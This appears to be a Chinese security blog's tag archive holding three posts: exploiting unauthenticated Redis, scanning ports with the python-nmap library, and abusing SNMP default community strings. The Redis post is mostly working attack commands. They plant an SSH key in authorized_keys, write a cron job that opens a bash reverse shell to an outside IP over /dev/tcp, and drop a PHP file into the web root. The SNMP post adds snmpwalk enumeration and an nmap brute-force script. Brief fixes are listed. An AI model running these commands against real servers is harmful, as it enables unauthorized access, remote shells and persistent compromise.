标签归档:nmap

Redis未授权访问利用

漏洞利用:
redis的利用主要是通过config动态修改配置,修改快照存储的文件名称和位置,来写入SSH key 、webshell、crontab。
1)如果ssh端口开放,可直接把自己生成的SSH公钥文件写入到user/.ssh的目录下,实现ssh免认证登录。

config set dir /root/.ssh/
config set dbfilename authorized_keys
set xxxx "生成的公钥"
save
exit

2)如果ssh端口未开放,可以写到crontab 里执行反弹。
利用方式如下:

echo -e "\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.190.201/8888 0>&1\n\n"|/usr/local/bin/redis-cli -h 192.168.192.120 -x set 1
/usr/local/bin/redis-cli -h 192.168.192.120 config set dir /var/spool/cron/
/usr/local/bin/redis-cli -h 192.168.192.120 config set dbfilename root
/usr/local/bin/redis-cli -h 192.168.192.120 save

PS:
偶然发现当反弹IP写为8.8.8.8的时候,redis内容正常

127.0.0.1:6379> get 1
"\n\n*/1 * * * * bash -i >& /dev/tcp/8.8.8.8/2333 0>&1\n\n\n"

但是save持久化后,定时任务写入的是乱码,如下:

123

有些IP不行 还有10.10.10.10等写入的时候不正常。

3)针对Web服务如果知道web路径(例如phpinfo)可以直接写shell。

[root@vincent src]# ./redis-cli -h 172.16.100.151
172.16.100.151:6379> config set dir /var/www/html/
OK
172.16.100.151:6379> config set dbfilename redis.php
OK
172.16.100.151:6379> set webshell "<?php phpinfo(); ?>"
OK
172.16.100.151:6379> save
OK

漏洞修补:
1)禁止以Root权限启动redis
2)redis设置认证密码
3)SSH限制外网访问

nmap脚本:
nmap -p 6379  –script redis-info 127.0.0.1

python nmap库用法

# -*- coding: utf8 -*-
from time import strftime, localtime
from datetime import timedelta, date
import time
import json
import datetime
import sqlite3
import os
import nmap
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
def nmapscan(ip):
    nm = nmap.PortScanner()
    nm.scan(hosts=ip,ports='80,3306,9200')
    print nm.scaninfo()
    print nm.command_line() 
    for host in nm.all_hosts():
        for proto in nm[host].all_protocols():
            lport = nm[host][proto].keys()
            lport.sort()
            count_port = len(lport)
            i = 0
            while i < count_port:
                in_port = lport[i]
                if nm[host][proto][in_port]['state'] == 'open':
                    print host + ":" + str(in_port) + " => " + nm[host][proto][in_port]['name']
                i+=1
if __name__ == '__main__':
    start = time.time()
    nmapscan('10.59.0.116')
    end = time.time()
    print "程序执行时间:" + str(int(end - start)) + "s"

执行结果为:
[root@server120 tmp]# python thread.py
{‘tcp’: {‘services’: ‘80,3306,9200’, ‘method’: ‘syn’}}
nmap -oX – -p 80,3306,9200 -sV 10.59.0.116
10.59.0.116:80 => http
10.59.0.116:9200 => wap-wsp
程序执行时间:90s

默认的执行参数如下:
nmap -oX – -p 80,3306,9200 -sV 10.59.0.116
使用-sV会尝试探测端口的服务类型/具体版本等信息,速度慢一些,可以尝试修改nmap参数
nm.scan(hosts=ip,arguments=’-sS -p 80,3306,9200′)
执行结果:
[root@server120 tmp]# python thread.py
{‘tcp’: {‘services’: ‘80,3306,9200’, ‘method’: ‘syn’}}
nmap -oX – -sS -p 80,3306,9200 10.59.0.116
10.59.0.116:80 => http
10.59.0.116:9200 => wap-wsp
程序执行时间:5s
可以看出执行时间缩短了很多

SNMP弱口令利用

Yum安装

yum install -y net-snmp net-snmp-utils

启动SNMP

service snmpd start

Linux下利用:
snmpwalk -c SNMP读密码 -v 1或2(代表SNMP版本) IP OID(对象标示符)

snmpwalk -v 2c -c public 10.59.0.73

获取内存

[root@localhost subsys]# snmpwalk -v 2c -c public 10.59.0.73 .1.3.6.1.2.1.25.2.2 
HOST-RESOURCES-MIB::hrMemorySize.0 = INTEGER: 32477184 KBytes

获取IP信息

[root@localhost subsys]# snmpwalk -v 2c -c public 10.59.0.73 .1.3.6.1.2.1.4.20
IP-MIB::ipAdEntAddr.10.59.0.73 = IpAddress: 10.59.0.73
IP-MIB::ipAdEntAddr.10.81.0.73 = IpAddress: 10.81.0.73
...

 

Windows下使用MIB Browser

修复建议:

vim /etc/snmp/snmpd.conf
# sec.name source community
com2sec notConfigUser default public#修改这里
[root@server120 ~]# service snmpd restart

使用Nmap扫描

[root@server144 ~]# nmap -sU -p 161 --script=snmp-brute 192.168.192.120

Starting Nmap 5.51 ( http://nmap.org ) at 2017-09-08 11:45 CST
Nmap scan report for localhost (192.168.192.120)
Host is up (0.00083s latency).
PORT STATE SERVICE
161/udp open snmp
|_snmp-brute: public
MAC Address: 52:54:00:26:BE:A2 (QEMU Virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds